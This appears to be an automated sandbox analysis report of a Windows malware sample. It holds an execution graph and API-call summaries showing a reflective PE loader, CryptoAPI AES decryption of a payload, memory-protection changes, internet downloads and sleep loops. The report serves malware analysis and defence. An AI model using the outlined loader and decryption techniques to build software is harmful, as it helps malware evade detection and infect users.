                                                  Execution Graph

                                                  Execution Coverage:2.5%
                                                  Dynamic/Decrypted Code Coverage:20%
                                                  Signature Coverage:11.7%
                                                  Total number of Nodes:1107
                                                  Total number of Limit Nodes:24
37454->37443 37932 4037d0 37454->37932 37455 405a76 37461 402200 25 API calls 37455->37461 37463 405b17 37456->37463 37466 405b74 37459->37466 37462 405a7e 37461->37462 37467 402200 25 API calls 37462->37467 37944 4065e0 39 API calls 2 library calls 37463->37944 37464 405be1 37474 4022d0 27 API calls 37464->37474 37465 405caf 37475 4022d0 27 API calls 37465->37475 37949 4066f0 39 API calls 2 library calls 37466->37949 37470 405a86 37467->37470 37941 401710 CoUninitialize 37470->37941 37471 405b1c 37478 4022d0 27 API calls 37471->37478 37472 405b79 37480 4022d0 27 API calls 37472->37480 37476 405bf1 37474->37476 37477 405cbf 37475->37477 37954 402250 25 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 37476->37954 37487 402200 25 API calls 37477->37487 37481 405b2c 37478->37481 37483 405b89 37480->37483 37945 402250 25 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 37481->37945 37482 405bfa 37486 402200 25 API calls 37482->37486 37950 402250 25 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 37483->37950 37490 405c02 37486->37490 37491 405cd3 37487->37491 37488 405b92 37493 402200 25 API calls 37488->37493 37489 405b35 37494 402200 25 API calls 37489->37494 37955 406870 39 API calls 2 library calls 37490->37955 37492 405d94 37491->37492 37962 406b90 39 API calls 2 library calls 37491->37962 37970 406eb0 39 API calls 2 library calls 37492->37970 37498 405b9a 37493->37498 37499 405b3d 37494->37499 37951 408440 27 API calls 37498->37951 37946 408440 27 API calls 37499->37946 37500 405c07 37506 4022d0 27 API calls 37500->37506 37501 405ce0 37508 4022d0 27 API calls 37501->37508 37502 405d9e 37509 4022d0 27 API calls 37502->37509 37505 405b49 37848 4016b0 37505->37848 37507 405c17 37506->37507 37956 402250 25 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 37507->37956 37512 405cf0 37508->37512 37513 405dae 37509->37513 37963 402250 25 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 37512->37963 37523 402200 25 API calls 37513->37523 37514 406136 37852 407c30 
37514->37852 37515 405c20 37518 402200 25 API calls 37515->37518 37521 405c28 37518->37521 37519 405cf9 37522 402200 25 API calls 37519->37522 37520 40613f 37530 4022d0 27 API calls 37520->37530 37957 4068f0 39 API calls 2 library calls 37521->37957 37525 405d01 37522->37525 37526 405dc2 37523->37526 37964 406c10 39 API calls 2 library calls 37525->37964 37529 405ea9 37526->37529 37971 406f30 39 API calls 2 library calls 37526->37971 37527 405c2d 37539 4022d0 27 API calls 37527->37539 37981 4072d0 39 API calls 2 library calls 37529->37981 37531 406152 37530->37531 37862 407bb0 37531->37862 37533 405d06 37541 4022d0 27 API calls 37533->37541 37536 405eb3 37544 4022d0 27 API calls 37536->37544 37537 405dcf 37543 4022d0 27 API calls 37537->37543 37538 40615d 37547 4022d0 27 API calls 37538->37547 37540 405c3d 37539->37540 37552 402200 25 API calls 37540->37552 37542 405d16 37541->37542 37965 402250 25 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 37542->37965 37546 405ddf 37543->37546 37548 405ec3 37544->37548 37972 402250 25 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 37546->37972 37551 406170 37547->37551 37559 402200 25 API calls 37548->37559 37549 405d1f 37553 402200 25 API calls 37549->37553 37872 407b10 37551->37872 37556 405c51 37552->37556 37560 405d27 37553->37560 37554 405de8 37561 402200 25 API calls 37554->37561 37557 405c72 37556->37557 37558 405c55 37556->37558 37959 406a00 39 API calls 2 library calls 37557->37959 37958 406980 39 API calls 2 library calls 37558->37958 37564 405ed7 37559->37564 37966 406c90 39 API calls 2 library calls 37560->37966 37566 405df0 37561->37566 37562 40617b 37577 4022d0 27 API calls 37562->37577 37569 405f59 37564->37569 37570 405edb 37564->37570 37973 406fb0 39 API calls 2 library calls 37566->37973 37568 405c5a 37581 4022d0 27 API calls 37568->37581 37988 4074f0 39 API calls 2 library calls 37569->37988 37982 407360 39 API calls 2 library calls 37570->37982 37571 405d2c 37582 4022d0 27 API calls 37571->37582 37573 
405c77 37583 4022d0 27 API calls 37573->37583 37576 405df5 37587 4022d0 27 API calls 37576->37587 37580 40618e 37577->37580 37578 405f5e 37590 4022d0 27 API calls 37578->37590 37579 405ee0 37591 4022d0 27 API calls 37579->37591 37882 408560 37580->37882 37585 405c6a 37581->37585 37586 405d3c 37582->37586 37588 405c87 37583->37588 38007 402250 25 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 37585->38007 37603 402200 25 API calls 37586->37603 37592 405e05 37587->37592 37599 402200 25 API calls 37588->37599 37596 405f6e 37590->37596 37597 405ef0 37591->37597 37974 402250 25 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 37592->37974 37594 4061bb 37890 408670 37594->37890 37613 402200 25 API calls 37596->37613 37983 402250 25 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 37597->37983 37605 405c9b 37599->37605 37601 40611b 37607 402200 25 API calls 37601->37607 37609 405d50 37603->37609 37604 405e0e 37610 402200 25 API calls 37604->37610 37605->37505 37960 406a90 39 API calls 2 library calls 37605->37960 37607->37505 37608 405ef9 37614 402200 25 API calls 37608->37614 37615 405d54 37609->37615 37616 405d5e 37609->37616 37611 405e16 37610->37611 37975 407030 39 API calls 2 library calls 37611->37975 37612 4085c0 27 API calls 37621 4061e8 37612->37621 37622 405f82 37613->37622 37623 405f01 37614->37623 37967 406d20 39 API calls 2 library calls 37615->37967 37968 406da0 39 API calls 2 library calls 37616->37968 37626 408670 27 API calls 37621->37626 37627 406004 37622->37627 37628 405f86 37622->37628 37984 4073e0 39 API calls 2 library calls 37623->37984 37624 405e1b 37637 4022d0 27 API calls 37624->37637 37625 405d63 37638 4022d0 27 API calls 37625->37638 37630 4061fd 37626->37630 37995 407700 39 API calls 2 library calls 37627->37995 37989 407580 39 API calls 2 library calls 37628->37989 37634 4085c0 27 API calls 37630->37634 37633 405f06 37640 4022d0 27 API calls 37633->37640 37639 406215 37634->37639 37635 406009 37644 4022d0 27 API calls 37635->37644 37636 
405f8b 37645 4022d0 27 API calls 37636->37645 37641 405e2b 37637->37641 37642 405d73 37638->37642 37643 402200 25 API calls 37639->37643 37646 405f16 37640->37646 37976 402250 25 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 37641->37976 37657 402200 25 API calls 37642->37657 37648 406223 37643->37648 37649 406019 37644->37649 37650 405f9b 37645->37650 37985 402250 25 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 37646->37985 37653 402200 25 API calls 37648->37653 37664 402200 25 API calls 37649->37664 37990 402250 25 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 37650->37990 37652 405e34 37656 402200 25 API calls 37652->37656 37658 40622e 37653->37658 37655 405f1f 37660 402200 25 API calls 37655->37660 37661 405e3c 37656->37661 37662 405d87 37657->37662 37663 402200 25 API calls 37658->37663 37659 405fa4 37665 402200 25 API calls 37659->37665 37666 405f27 37660->37666 37977 4070b0 39 API calls 2 library calls 37661->37977 37662->37505 37969 406e30 39 API calls 2 library calls 37662->37969 37668 406239 37663->37668 37669 40602d 37664->37669 37670 405fac 37665->37670 37986 407470 39 API calls 2 library calls 37666->37986 37674 402200 25 API calls 37668->37674 37676 406031 37669->37676 37677 406084 37669->37677 37991 407600 39 API calls 2 library calls 37670->37991 37672 405e41 37687 4022d0 27 API calls 37672->37687 37675 406244 37674->37675 37680 402200 25 API calls 37675->37680 37996 407790 39 API calls 2 library calls 37676->37996 38001 407910 39 API calls 2 library calls 37677->38001 37679 405f2c 37690 4022d0 27 API calls 37679->37690 37685 40624f 37680->37685 37682 405fb1 37692 4022d0 27 API calls 37682->37692 37684 406089 37694 4022d0 27 API calls 37684->37694 37689 402200 25 API calls 37685->37689 37686 406036 37696 4022d0 27 API calls 37686->37696 37688 405e51 37687->37688 37699 402200 25 API calls 37688->37699 37691 40625a 37689->37691 37693 405f3c 37690->37693 37695 402200 25 API calls 37691->37695 37697 405fc1 37692->37697 37987 402250 25 API 
calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 37693->37987 37700 406099 37694->37700 37701 406265 37695->37701 37702 406046 37696->37702 37992 402250 25 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 37697->37992 37706 405e65 37699->37706 37716 402200 25 API calls 37700->37716 37707 402200 25 API calls 37701->37707 37997 402250 25 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 37702->37997 37704 405f45 37705 402200 25 API calls 37704->37705 37705->37505 37711 405e6e 37706->37711 37978 407140 39 API calls 2 library calls 37706->37978 37751 406274 37707->37751 37709 405fca 37710 402200 25 API calls 37709->37710 37714 405fd2 37710->37714 37979 4071c0 39 API calls 2 library calls 37711->37979 37712 40604f 37713 402200 25 API calls 37712->37713 37718 406057 37713->37718 37993 407680 39 API calls 2 library calls 37714->37993 37720 4060ad 37716->37720 37998 407810 39 API calls 2 library calls 37718->37998 37720->37505 38002 407990 39 API calls 2 library calls 37720->38002 37721 405e78 37727 4022d0 27 API calls 37721->37727 37723 405fd7 37728 4022d0 27 API calls 37723->37728 37724 40605c 37731 4022d0 27 API calls 37724->37731 37726 4060b6 37735 4022d0 27 API calls 37726->37735 37730 405e88 37727->37730 37732 405fe7 37728->37732 37729 4062d9 Sleep 37729->37751 37737 402200 25 API calls 37730->37737 37733 40606c 37731->37733 37994 402250 25 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 37732->37994 37999 402250 25 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 37733->37999 37740 4060c6 37735->37740 37736 4022d0 27 API calls 37736->37751 37742 405e9c 37737->37742 37739 405ff0 37744 402200 25 API calls 37739->37744 38003 402250 25 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 37740->38003 37742->37505 37980 407250 39 API calls 2 library calls 37742->37980 37743 406075 37746 402200 25 API calls 37743->37746 37744->37505 37745 4060cf 37747 402200 25 API calls 37745->37747 37749 40607d 37746->37749 37750 4060d7 37747->37750 38000 407890 39 API calls 2 library calls 
37749->38000 38004 407a10 39 API calls 2 library calls 37750->38004 37751->37729 37751->37736 37752 4062e2 37751->37752 37758 4062d1 37751->37758 37755 402200 25 API calls 37752->37755 37757 4062ea 37755->37757 37756 4060dc 37765 4022d0 27 API calls 37756->37765 37893 408490 37757->37893 37761 402200 25 API calls 37758->37761 37760 406082 37764 4022d0 27 API calls 37760->37764 37761->37729 37762 4062fe 37763 408490 27 API calls 37762->37763 37766 406317 37763->37766 37764->37585 37767 4060ec 37765->37767 37768 408490 27 API calls 37766->37768 38005 402250 25 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 37767->38005 37773 40632a 37768->37773 37770 4060f5 37771 402200 25 API calls 37770->37771 37772 4060fd 37771->37772 38006 407a90 39 API calls 2 library calls 37772->38006 37775 408490 27 API calls 37773->37775 37777 406352 37773->37777 37775->37777 38008 407cc0 39 API calls 2 library calls 37777->38008 37778 40635f 37779 4022d0 27 API calls 37778->37779 37780 40636f 37779->37780 37781 402200 25 API calls 37780->37781 37782 406383 37781->37782 37783 406420 37782->37783 37785 4016b0 27 API calls 37782->37785 38011 407e30 39 API calls 2 library calls 37783->38011 37787 40639e 37785->37787 37786 406425 37790 4022d0 27 API calls 37786->37790 38009 407d50 39 API calls 2 library calls 37787->38009 37789 4063a7 37792 4022d0 27 API calls 37789->37792 37791 406438 37790->37791 37793 402200 25 API calls 37791->37793 37795 4063b7 37792->37795 37794 40644f 37793->37794 37819 4064af 37794->37819 38012 407fa0 39 API calls 2 library calls 37794->38012 37800 4063e7 37795->37800 37801 4063d8 Sleep 37795->37801 37796 4037d0 39 API calls 37798 4064c0 37796->37798 37799 406460 37803 4022d0 27 API calls 37799->37803 37806 4022d0 27 API calls 37800->37806 37801->37795 37802 4063e5 37801->37802 37804 406409 37802->37804 37805 40646f 37803->37805 37807 402200 25 API calls 37804->37807 38013 407f20 39 API calls 2 library calls 37805->38013 37809 4063fe 37806->37809 37810 406411 
37807->37810 37812 402200 25 API calls 37809->37812 38010 401710 CoUninitialize 37810->38010 37811 406483 37814 4022d0 27 API calls 37811->37814 37812->37804 37815 406492 37814->37815 38014 407ec0 39 API calls __Init_thread_footer 37815->38014 37817 4064a0 37818 4022d0 27 API calls 37817->37818 37818->37819 37819->37796 38015 40f188 37820->38015 37822 40560f 37823 40f042 37822->37823 38026 4111fd GetLastError 37823->38026 37827 40652e 37826->37827 37828 4064fc 37826->37828 37830 408ec2 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 37827->37830 38064 409170 6 API calls 37828->38064 37832 406540 37830->37832 37831 406506 37831->37827 38065 409482 28 API calls 37831->38065 37832->37414 37834 406524 38066 409126 RtlEnterCriticalSection RtlLeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 37834->38066 37837 4022f3 37836->37837 37837->37837 37838 402470 27 API calls 37837->37838 37839 402305 37838->37839 37839->37418 37841 40220b 37840->37841 37842 402226 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 37840->37842 37841->37842 37843 40c26f 25 API calls 37841->37843 37842->37422 37844 40224a 37843->37844 37845 402281 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 37844->37845 37846 40c26f 25 API calls 37844->37846 37845->37422 37847 4022cc 37846->37847 37849 4016c3 __cftof 37848->37849 37850 409035 27 API calls 37849->37850 37851 4016da __cftof 37850->37851 37851->37514 37853 407c9e 37852->37853 37854 407c62 37852->37854 37856 408ec2 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 37853->37856 38067 409170 6 API calls 37854->38067 37858 407cb0 37856->37858 37857 407c6c 37857->37853 38068 409482 28 API calls 37857->38068 37858->37520 37860 407c94 38069 409126 RtlEnterCriticalSection RtlLeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 37860->38069 37863 407bdc 37862->37863 37871 407c0e 37862->37871 38070 409170 6 API calls 37863->38070 37865 408ec2 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API 
calls 37866 407c20 37865->37866 37866->37538 37867 407be6 37867->37871 38071 409482 28 API calls 37867->38071 37869 407c04 38072 409126 RtlEnterCriticalSection RtlLeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 37869->38072 37871->37865 37873 407b92 37872->37873 37874 407b4d 37872->37874 37876 408ec2 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 37873->37876 38073 409170 6 API calls 37874->38073 37878 407ba5 37876->37878 37877 407b57 37877->37873 38074 409482 28 API calls 37877->38074 37878->37562 37880 407b88 38075 409126 RtlEnterCriticalSection RtlLeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 37880->38075 37883 408572 37882->37883 37884 408a60 27 API calls 37883->37884 37885 4061a3 37884->37885 37886 4085c0 37885->37886 37887 4085d9 37886->37887 37888 4085ed __InternalCxxFrameHandler 37887->37888 38076 402740 27 API calls 3 library calls 37887->38076 37888->37594 38077 408880 37890->38077 37892 4061d0 37892->37612 37894 4084bb 37893->37894 37895 4084c2 37894->37895 37896 408514 37894->37896 37897 4084f5 37894->37897 37895->37762 37904 408509 __InternalCxxFrameHandler 37896->37904 38099 401600 27 API calls 4 library calls 37896->38099 37898 40854a 37897->37898 37899 4084fc 37897->37899 38100 401600 27 API calls 3 library calls 37898->38100 38098 401600 27 API calls 4 library calls 37899->38098 37903 408502 37903->37904 37905 40c26f 25 API calls 37903->37905 37904->37762 37906 408554 37905->37906 37907->37436 37908->37436 37909->37436 37910->37436 37912 408ae8 37911->37912 37915 408a7a __InternalCxxFrameHandler 37911->37915 38101 408b10 27 API calls 3 library calls 37912->38101 37914 408afa 37914->37436 37915->37436 37917 401db2 37916->37917 37917->37917 37918 402470 27 API calls 37917->37918 37919 401dc5 37918->37919 37920 402470 27 API calls 37919->37920 37921 401e8d __InternalCxxFrameHandler 37920->37921 38102 40c34c 37921->38102 37924 402033 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 37926 408ec2 
__ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 37924->37926 37925 401fc3 37925->37924 37927 402062 37925->37927 37928 402057 37926->37928 37929 40c26f 25 API calls 37927->37929 37928->37436 37930 402067 37929->37930 37931 401d60 39 API calls 37930->37931 37933 40f00b 23 API calls 37932->37933 37934 4037d7 37933->37934 38131 4082a0 27 API calls 3 library calls 37934->38131 37936 4038a1 37936->37443 37938 403844 37938->37936 38132 40f021 37 API calls _unexpected 37938->38132 38133 408740 27 API calls 3 library calls 37938->38133 37940->37455 37942->37435 37943->37449 37944->37471 37945->37489 37946->37505 37947->37434 37948->37453 37949->37472 37950->37488 37951->37505 37952->37428 37953->37464 37954->37482 37955->37500 37956->37515 37957->37527 37958->37568 37959->37573 37960->37568 37961->37465 37962->37501 37963->37519 37964->37533 37965->37549 37966->37571 37967->37568 37968->37625 37969->37492 37970->37502 37971->37537 37972->37554 37973->37576 37974->37604 37975->37624 37976->37652 37977->37672 37978->37711 37979->37721 37980->37529 37981->37536 37982->37579 37983->37608 37984->37633 37985->37655 37986->37679 37987->37704 37988->37578 37989->37636 37990->37659 37991->37682 37992->37709 37993->37723 37994->37739 37995->37635 37996->37686 37997->37712 37998->37724 37999->37743 38000->37760 38001->37684 38002->37726 38003->37745 38004->37756 38005->37770 38006->37760 38007->37601 38008->37778 38009->37789 38011->37786 38012->37799 38013->37811 38014->37817 38016 40f197 38015->38016 38017 40f1ac 38015->38017 38023 40c339 14 API calls __dosmaperr 38016->38023 38022 40f1a7 __alldvrm 38017->38022 38025 411df2 6 API calls _unexpected 38017->38025 38019 40f19c 38024 40c25f 25 API calls _mbstowcs 38019->38024 38022->37822 38023->38019 38024->38022 38025->38022 38027 41121a 38026->38027 38028 411214 38026->38028 38032 411220 SetLastError 38027->38032 38057 411db0 6 API calls _unexpected 38027->38057 38056 411d71 6 API calls _unexpected 38028->38056 
38031 411238 38031->38032 38033 41123c 38031->38033 38039 4112b4 38032->38039 38040 405618 Sleep 38032->38040 38058 411a65 14 API calls 2 library calls 38033->38058 38035 411248 38037 411250 38035->38037 38038 411267 38035->38038 38059 411db0 6 API calls _unexpected 38037->38059 38060 411db0 6 API calls _unexpected 38038->38060 38063 40fad9 37 API calls __CreateFrameInfo 38039->38063 38040->37406 38045 411273 38046 411277 38045->38046 38047 411288 38045->38047 38061 411db0 6 API calls _unexpected 38046->38061 38062 41102b 14 API calls _unexpected 38047->38062 38049 411ac2 _free 14 API calls 38052 411264 38049->38052 38051 411293 38054 411ac2 _free 14 API calls 38051->38054 38052->38032 38053 41125e 38053->38049 38055 41129a 38054->38055 38055->38032 38056->38027 38057->38031 38058->38035 38059->38053 38060->38045 38061->38053 38062->38051 38064->37831 38065->37834 38066->37827 38067->37857 38068->37860 38069->37853 38070->37867 38071->37869 38072->37871 38073->37877 38074->37880 38075->37873 38076->37888 38078 4088c3 38077->38078 38079 408a50 38078->38079 38080 408990 38078->38080 38081 4088c8 __InternalCxxFrameHandler 38078->38081 38096 4016a0 27 API calls std::_Xinvalid_argument 38079->38096 38084 4089c5 38080->38084 38087 4089eb 38080->38087 38081->37892 38083 408a55 38097 401600 27 API calls 3 library calls 38083->38097 38084->38083 38086 4089d0 38084->38086 38094 401600 27 API calls 4 library calls 38086->38094 38093 4089dd __InternalCxxFrameHandler 38087->38093 38095 401600 27 API calls 4 library calls 38087->38095 38088 4089d6 38091 40c26f 25 API calls 38088->38091 38088->38093 38092 408a5f 38091->38092 38093->37892 38094->38088 38095->38093 38097->38088 38098->37903 38099->37904 38100->37903 38101->37914 38105 41144f 38102->38105 38108 411463 38105->38108 38106 411467 38123 401ed8 InternetOpenA 38106->38123 38124 40c339 14 API calls __dosmaperr 38106->38124 38108->38106 38110 4114a1 38108->38110 38108->38123 38109 411491 38125 40c25f 25 API calls _mbstowcs 
38109->38125 38126 40c369 37 API calls 2 library calls 38110->38126 38113 4114ad 38114 4114b7 38113->38114 38118 4114ce 38113->38118 38127 417a24 25 API calls 2 library calls 38114->38127 38116 411550 38116->38123 38128 40c339 14 API calls __dosmaperr 38116->38128 38117 4115a5 38117->38123 38130 40c339 14 API calls __dosmaperr 38117->38130 38118->38116 38118->38117 38121 411599 38129 40c25f 25 API calls _mbstowcs 38121->38129 38123->37925 38124->38109 38125->38123 38126->38113 38127->38123 38128->38121 38129->38123 38130->38123 38131->37938 38132->37938 38133->37938 38135 40eeb7 38134->38135 38136 40eec9 38134->38136 38162 409906 GetModuleHandleW 38135->38162 38146 40ed50 38136->38146 38139 40eebc 38139->38136 38163 40ef4f GetModuleHandleExW 38139->38163 38141 4096cf 38141->37386 38145 40ef0c 38147 40ed5c __FrameHandler3::FrameUnwindToState 38146->38147 38169 40f28c RtlEnterCriticalSection 38147->38169 38149 40ed66 38170 40edbc 38149->38170 38151 40ed73 38174 40ed91 38151->38174 38154 40ef0d 38179 41366f GetPEB 38154->38179 38157 40ef3c 38160 40ef4f __CreateFrameInfo 3 API calls 38157->38160 38158 40ef1c GetPEB 38158->38157 38159 40ef2c GetCurrentProcess TerminateProcess 38158->38159 38159->38157 38161 40ef44 ExitProcess 38160->38161 38162->38139 38164 40ef91 38163->38164 38165 40ef6e GetProcAddress 38163->38165 38167 40eec8 38164->38167 38168 40ef97 FreeLibrary 38164->38168 38166 40ef83 38165->38166 38166->38164 38167->38136 38168->38167 38169->38149 38171 40edc8 __FrameHandler3::FrameUnwindToState 38170->38171 38172 40ee29 __CreateFrameInfo 38171->38172 38177 410940 14 API calls __CreateFrameInfo 38171->38177 38172->38151 38178 40f2d4 RtlLeaveCriticalSection 38174->38178 38176 40ed7f 38176->38141 38176->38154 38177->38172 38178->38176 38180 413689 38179->38180 38182 40ef17 38179->38182 38183 411c94 5 API calls _unexpected 38180->38183 38182->38157 38182->38158 38183->38182 38184 9a1326 38185 9a1387 38184->38185 38191 9a132f 38184->38191 38186 9a13a1 RegOpenKeyA 
38185->38186 38187 9a13c1 RegOpenKeyA 38185->38187 38186->38187 38188 9a13b7 38186->38188 38189 9a13de 38187->38189 38188->38187 38190 9a1422 GetNativeSystemInfo 38189->38190 38189->38191 38190->38191 38192 99f306 38193 9a172c LoadLibraryA 38192->38193 38195 9a3a03 38193->38195

                                                  Control-flow Graph (function at 402c70)
                                                  APIs
                                                  • SetLastError.KERNEL32(0000000D), ref: 00402C96
                                                  • SetLastError.KERNEL32(000000C1), ref: 00402CD8
                                                  Strings
                                                  • DOS header is not valid!, xrefs: 00402CC6
                                                  • @, xrefs: 00402C8F
                                                  • FileHeader.Machine != HOST_MACHINE!, xrefs: 00402D4A
                                                  • alignedImageSize != AlignValueUp!, xrefs: 00402DB9
                                                  • DOS header size is not valid!, xrefs: 00402D09
                                                  • ERROR_OUTOFMEMORY!, xrefs: 00402DEF
                                                  • Section alignment invalid!, xrefs: 00402D5C
                                                  • Signature != IMAGE_NT_SIGNATURE!, xrefs: 00402D38
                                                  • Size is not valid!, xrefs: 00402C9C
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2597509559.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2597509559.000000000042A000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_zSmMqGGeVy.jbxd
                                                  Similarity
                                                  • API ID: ErrorLast
                                                  • String ID: @$DOS header is not valid!$DOS header size is not valid!$ERROR_OUTOFMEMORY!$FileHeader.Machine != HOST_MACHINE!$Section alignment invalid!$Signature != IMAGE_NT_SIGNATURE!$Size is not valid!$alignedImageSize != AlignValueUp!
                                                  • API String ID: 1452528299-393758929
                                                  • Opcode ID: a7ee295ea28172196232d939963434d58e5a2b4f3baf6ecdb48b764af0884dbc
                                                  • Instruction ID: 68209fb506ae9b68e90255ee0055c9910cae7d9580854ddc7816d62818b51dcc
                                                  • Opcode Fuzzy Hash: a7ee295ea28172196232d939963434d58e5a2b4f3baf6ecdb48b764af0884dbc
                                                  • Instruction Fuzzy Hash: 3E129C71B002159BDB14CF98D985BAEBBB5BF48304F14416AE809BB3C1D7B8ED41CB98

                                                  Control-flow Graph

                                                  APIs
                                                  • CryptAcquireContextW.ADVAPI32(?,00000000,?,00000018,F0000000,400415DF), ref: 00403540
                                                  • CryptCreateHash.ADVAPI32(?,0000800C,00000000,00000000,?), ref: 00403564
                                                  • _mbstowcs.LIBCMT ref: 004035B7
                                                  • CryptHashData.ADVAPI32(?,00000000,?,00000000), ref: 004035CE
                                                  • GetLastError.KERNEL32 ref: 004035D8
                                                  • CryptDeriveKey.ADVAPI32(?,0000660E,?,00000000,?), ref: 00403600
                                                  • GetLastError.KERNEL32 ref: 0040360A
                                                  • CryptReleaseContext.ADVAPI32(?,00000000), ref: 0040361A
                                                  • CryptDecrypt.ADVAPI32(?,00000000,00000000,00000000,?,00000000), ref: 004036DC
                                                  • CryptDestroyKey.ADVAPI32(?), ref: 0040374E
                                                  Strings
                                                  • Microsoft Enhanced RSA and AES Cryptographic Provider, xrefs: 0040351C
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2597509559.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2597509559.000000000042A000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_zSmMqGGeVy.jbxd
                                                  Similarity
                                                  • API ID: Crypt$ContextErrorHashLast$AcquireCreateDataDecryptDeriveDestroyRelease_mbstowcs
                                                  • String ID: Microsoft Enhanced RSA and AES Cryptographic Provider
                                                  • API String ID: 3642901890-63410773
                                                  • Opcode ID: b9aca645bf8e0e24d310163d35795d59eee685dab11f25e4e54b3c0023d62c89
                                                  • Instruction ID: 057eae88fc1e8b42dc2b0b13f8460ebd140b44a30a8541124d595f3772e2d34e
                                                  • Opcode Fuzzy Hash: b9aca645bf8e0e24d310163d35795d59eee685dab11f25e4e54b3c0023d62c89
                                                  • Instruction Fuzzy Hash: 4D8182B1A00218AFEF248F25CC45B9ABBB9EF45304F1081BAE50DE7291DB359E858F55

                                                  Control-flow Graph

                                                  APIs
                                                  • VirtualProtect.KERNEL32(?,?,?,?), ref: 004029F8
                                                  • GetLastError.KERNEL32(00000400,?,00000000,00000000,?,?,?,?), ref: 00402A0D
                                                  • FormatMessageA.KERNEL32(00001300,00000000,00000000,?,?,?,?), ref: 00402A1B
                                                  • LocalAlloc.KERNEL32(00000040,?,?,?,?,?), ref: 00402A36
                                                  • OutputDebugStringA.KERNEL32(00000000,?,?), ref: 00402A55
                                                  • LocalFree.KERNEL32(00000000), ref: 00402A62
                                                  • LocalFree.KERNEL32(?), ref: 00402A67
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2597509559.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2597509559.000000000042A000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_zSmMqGGeVy.jbxd
                                                  Similarity
                                                  • API ID: Local$Free$AllocDebugErrorFormatLastMessageOutputProtectStringVirtual
                                                  • String ID: %s: %s$Error protecting memory page
                                                  • API String ID: 839691724-1484484497
                                                  • Opcode ID: 2c46ffc98d029cfadbc5bd6c783c679e7e34e813f473582b7efecdd829900f05
                                                  • Instruction ID: 2da31f80489fd9465a3e1d2b594a5759e7c0520832ca97f04c55df17c8a78757
                                                  • Opcode Fuzzy Hash: 2c46ffc98d029cfadbc5bd6c783c679e7e34e813f473582b7efecdd829900f05
                                                  • Instruction Fuzzy Hash: 0831F272B00114AFDB14DF58DC44FAAB7A8FF48304F0541AAE905EB291DA75AD12CA88

                                                  Control-flow Graph

                                                  APIs
                                                  • InternetSetFilePointer.WININET(?,00000000,00000000,00000000,00000000), ref: 00401905
                                                  • InternetReadFile.WININET(?,00000000,000003E8,00000000), ref: 00401924
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2597509559.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2597509559.000000000042A000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_zSmMqGGeVy.jbxd
                                                  Similarity
                                                  • API ID: FileInternet$PointerRead
                                                  • String ID: text
                                                  • API String ID: 3197321146-999008199
                                                  • Opcode ID: 87aac4e3b5ff56ab0de5e0ee71ca196cf257f89e2ae9c22cdb46c2756a6c72d5
                                                  • Instruction ID: 86dcce6fdabdf1d76a3839b2d4c7acaf7fb3a9f1032210a7d38a4a94718e3fd4
                                                  • Opcode Fuzzy Hash: 87aac4e3b5ff56ab0de5e0ee71ca196cf257f89e2ae9c22cdb46c2756a6c72d5
                                                  • Instruction Fuzzy Hash: 7AC16B71A002189FEB25CF24CD85BEAB7B9FF48304F1041ADE509A76A1DB75AE84CF54
                                                  APIs
                                                  • GetCurrentProcess.KERNEL32(?,?,0040EF0C,00000000,771ADF80,?,00000000,?,004114AD), ref: 0040EF2F
                                                  • TerminateProcess.KERNEL32(00000000,?,0040EF0C,00000000,771ADF80,?,00000000,?,004114AD), ref: 0040EF36
